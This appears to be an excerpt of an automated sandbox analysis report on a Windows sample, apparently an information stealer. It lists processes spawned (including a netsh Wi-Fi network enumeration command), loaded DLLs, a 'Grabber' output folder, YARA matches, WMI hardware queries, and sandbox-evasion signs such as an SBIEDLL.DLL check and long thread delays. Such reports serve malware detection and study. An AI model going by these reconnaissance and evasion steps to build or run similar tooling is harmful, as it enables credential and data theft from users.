                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr AllJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssidJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeFile written: C:\Users\user\AppData\Local\e40d0e63b27ae1bdf03271cbddc24ff7\user@302494_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.iniJump to behavior
                              Source: cOH7jKmo25.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: cOH7jKmo25.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
                              Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
                              Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeCode function: 0_2_0596EC58 push esp; iretd 0_2_0596EC59

                              Boot Survival

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                              Malware Analysis System Evasion

                              barindex
                              Source: Yara matchFile source: cOH7jKmo25.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.cOH7jKmo25.exe.7e0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1315479015.00000000007E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: cOH7jKmo25.exe PID: 7540, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                              Source: cOH7jKmo25.exeBinary or memory string: SBIEDLL.DLL
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeMemory allocated: 4B60000 memory reserve | memory write watchJump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599875Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599766Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599651Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599544Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599250Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 599099Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598984Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598875Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598766Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598656Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598547Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598438Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598325Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598219Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598109Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 598000Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597891Jump to behavior
                              Source: C:\Users\user\Desktop\cOH7jKmo25.exeThread delayed: delay time: 597781Jump to behavior
